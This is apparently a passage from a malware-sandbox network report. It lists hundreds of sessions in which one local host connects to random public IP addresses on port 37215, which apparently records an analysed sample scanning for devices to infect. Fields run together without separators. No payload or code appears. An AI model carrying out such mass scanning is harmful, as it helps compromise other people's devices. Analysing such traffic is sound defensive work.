                                              13371192.168.2.154333294.115.248.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13372192.168.2.1558052190.1.217.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13373192.168.2.1535824121.199.103.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13374192.168.2.155727894.163.226.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13375192.168.2.154420240.49.80.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13376192.168.2.1547934190.192.98.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13377192.168.2.1536252102.177.5.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13378192.168.2.1537952168.144.15.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13379192.168.2.155448894.65.192.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13380192.168.2.153932841.103.33.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13381192.168.2.1539964197.167.124.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13382192.168.2.1559992156.197.128.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13383192.168.2.1559864121.193.63.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13384192.168.2.1558454121.223.157.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13385192.168.2.1558812121.50.237.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13386192.168.2.1535644197.16.173.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13387192.168.2.1540928190.20.188.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13388192.168.2.155095037.184.255.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13389192.168.2.1545228190.81.204.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13390192.168.2.1543358186.239.115.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13391192.168.2.1534174190.234.34.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13392192.168.2.154899441.207.99.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13393192.168.2.1540594197.108.39.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13394192.168.2.1538476121.170.37.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13395192.168.2.1536690186.214.43.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13396192.168.2.153729437.50.154.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13397192.168.2.153483045.105.180.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13398192.168.2.1542436190.30.255.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13399192.168.2.1552700138.121.180.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13400192.168.2.153452845.154.227.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13401192.168.2.154028441.189.124.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13402192.168.2.1548460197.142.25.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13403192.168.2.1555878197.1.100.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13404192.168.2.1540418186.17.40.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13405192.168.2.155420245.9.71.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13406192.168.2.155662231.154.238.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13407192.168.2.153650245.215.189.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13408192.168.2.154217041.150.241.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13409192.168.2.154137094.109.213.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13410192.168.2.1554742124.162.89.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13411192.168.2.1557722222.15.104.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13412192.168.2.1535132157.112.230.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13413192.168.2.1539434190.205.184.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13414192.168.2.1556300222.62.233.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13415192.168.2.1545296190.147.178.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13416192.168.2.1551030190.131.119.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13417192.168.2.1559678197.215.34.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13418192.168.2.1540958122.11.132.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13419192.168.2.1558694181.245.155.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13420192.168.2.1536460121.137.175.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13421192.168.2.1553306157.150.39.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13422192.168.2.1559056122.88.114.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13423192.168.2.1555124222.60.238.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13424192.168.2.1560326121.154.222.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13425192.168.2.1533016181.1.235.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13426192.168.2.153360045.157.156.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13427192.168.2.1535546156.196.231.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13428192.168.2.1539630102.177.133.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13429192.168.2.154146634.64.236.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13430192.168.2.154685694.211.251.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13431192.168.2.1555240161.95.98.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13432192.168.2.1538426138.180.43.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13433192.168.2.154056837.71.180.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13434192.168.2.1543192121.201.6.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13435192.168.2.155294494.172.119.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13436192.168.2.1547590222.14.119.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13437192.168.2.1552238157.109.50.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13438192.168.2.1543716116.209.250.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13439192.168.2.1551534102.239.254.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13440192.168.2.153993441.231.148.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13441192.168.2.1553412138.33.169.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13442192.168.2.1536202102.3.107.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13443192.168.2.155737631.31.50.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13444192.168.2.1551058156.238.133.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13445192.168.2.1550560222.72.62.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13446192.168.2.1558388121.124.160.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13447192.168.2.1537686181.186.116.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13448192.168.2.1537626102.68.103.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13449192.168.2.1551002190.205.189.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13450192.168.2.155283437.138.170.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13451192.168.2.1547458190.110.54.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13452192.168.2.1551364102.48.63.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13453192.168.2.1547318138.76.18.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13454192.168.2.154316089.112.172.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13455192.168.2.1537544121.26.202.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13456192.168.2.155176845.177.21.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13457192.168.2.1548764122.162.63.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13458192.168.2.154344831.236.12.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13459192.168.2.155802837.68.204.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13460192.168.2.1559420138.6.200.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13461192.168.2.1554976138.228.35.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13462192.168.2.1550210190.183.223.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13463192.168.2.1538560186.133.77.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13464192.168.2.1540718197.26.184.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13465192.168.2.1535660122.100.78.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13466192.168.2.1539750181.70.208.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13467192.168.2.1560984121.206.187.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13468192.168.2.1533574186.163.79.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13469192.168.2.1554892138.160.156.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13470192.168.2.1536966156.90.168.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13471192.168.2.155062037.190.22.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13472192.168.2.155669841.89.12.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13473192.168.2.154524437.206.182.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13474192.168.2.154491241.190.178.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13475192.168.2.1538010197.61.64.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13476192.168.2.1534554222.46.55.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13477192.168.2.1557162190.156.140.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13478192.168.2.154641437.54.26.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13479192.168.2.1535724186.176.209.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13480192.168.2.154992094.180.185.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13481192.168.2.153502641.192.219.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13482192.168.2.1555386121.152.47.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13483192.168.2.1553854181.105.81.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13484192.168.2.1545588121.227.95.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13485192.168.2.1556962121.75.146.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13486192.168.2.1552024138.254.51.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13487192.168.2.1542946121.0.32.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13488192.168.2.1541942222.73.99.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13489192.168.2.153991841.214.117.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13490192.168.2.1559316118.137.47.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13491192.168.2.155129031.236.46.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13492192.168.2.1555712102.201.174.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13493192.168.2.1543720138.64.240.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13494192.168.2.1555018102.1.140.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13495192.168.2.1535268157.189.78.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13496192.168.2.155949241.149.14.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13497192.168.2.1560106122.247.170.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13498192.168.2.1539868181.243.27.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13499192.168.2.1550934157.143.188.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13500192.168.2.155625494.253.62.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13501192.168.2.1558480186.39.127.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13502192.168.2.1555742190.210.108.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13503192.168.2.1542140181.89.241.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13504192.168.2.1534472138.130.94.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13505192.168.2.155163045.113.201.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13506192.168.2.1552900138.104.216.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13507192.168.2.1535926157.29.230.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13508192.168.2.1560928181.56.118.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13509192.168.2.1558720157.47.143.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13510192.168.2.154231631.97.87.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13511192.168.2.1534680122.76.146.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13512192.168.2.154040031.93.66.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13513192.168.2.1554090102.120.218.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13514192.168.2.1554190157.14.197.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13515192.168.2.1537188138.119.52.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13516192.168.2.1541124102.90.29.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13517192.168.2.155064644.30.229.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13518192.168.2.1559670181.140.165.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13519192.168.2.1540032190.57.30.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13520192.168.2.1547984197.25.38.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13521192.168.2.1536780157.246.70.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13522192.168.2.15442264.221.11.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13523192.168.2.153599641.247.4.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13524192.168.2.1541914139.168.87.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13525192.168.2.1550020222.154.53.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13526192.168.2.153712094.143.10.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13527192.168.2.1537364121.252.71.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13528192.168.2.1534282138.179.123.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13529192.168.2.1552048121.192.167.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13530192.168.2.154820445.122.153.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13531192.168.2.1557448190.68.207.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13532192.168.2.155588041.231.226.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13533192.168.2.1535530138.187.0.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13534192.168.2.1556384186.89.0.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13535192.168.2.153842838.204.17.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13536192.168.2.1558164122.0.96.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13537192.168.2.1552420222.13.20.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13538192.168.2.1560384181.25.163.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13539192.168.2.1540442138.227.112.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13540192.168.2.1538730181.103.160.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13541192.168.2.153594237.176.210.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13542192.168.2.1533926122.248.120.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13543192.168.2.1548894181.67.48.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13544192.168.2.1540800122.33.11.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13545192.168.2.1553996181.120.176.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13546192.168.2.1560936138.78.158.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13547192.168.2.1547188156.131.81.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13548192.168.2.1552670157.130.121.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13549192.168.2.154941031.198.89.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13550192.168.2.1555478157.218.182.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13551192.168.2.155376445.213.193.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13552192.168.2.1536698138.154.3.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13553192.168.2.154433441.21.156.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13554192.168.2.1539870102.128.206.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13555192.168.2.1538794102.114.89.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13556192.168.2.155505445.157.186.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13557192.168.2.153454641.119.193.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13558192.168.2.1533504186.144.255.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13559192.168.2.154290694.122.106.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13560192.168.2.153797641.190.180.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13561192.168.2.1546724181.77.165.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13562192.168.2.155449245.229.162.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13563192.168.2.1537596156.160.105.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13564192.168.2.1541634157.234.173.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13565192.168.2.1556320197.241.162.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13566192.168.2.1535386222.75.69.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13567192.168.2.154512237.248.148.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13568192.168.2.1548560199.19.84.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13569192.168.2.1553526122.248.189.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13570192.168.2.1542132197.161.10.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13571192.168.2.1539044186.37.123.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13572192.168.2.1549686186.193.109.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13573192.168.2.1551182121.235.126.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13574192.168.2.154182631.179.202.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13575192.168.2.1538586181.10.79.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13576192.168.2.1550468156.206.57.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13577192.168.2.1543686222.214.58.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13578192.168.2.1560620197.147.58.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13579192.168.2.155807637.156.95.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13580192.168.2.1556158138.18.178.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13581192.168.2.154258845.172.170.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13582192.168.2.155743294.208.186.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13583192.168.2.154134441.118.140.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13584192.168.2.1532782157.152.226.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13585192.168.2.1548764190.166.236.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13586192.168.2.1559626156.235.91.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13587192.168.2.154894694.168.89.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13588192.168.2.1555534156.5.194.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13589192.168.2.1551256138.29.252.20137215
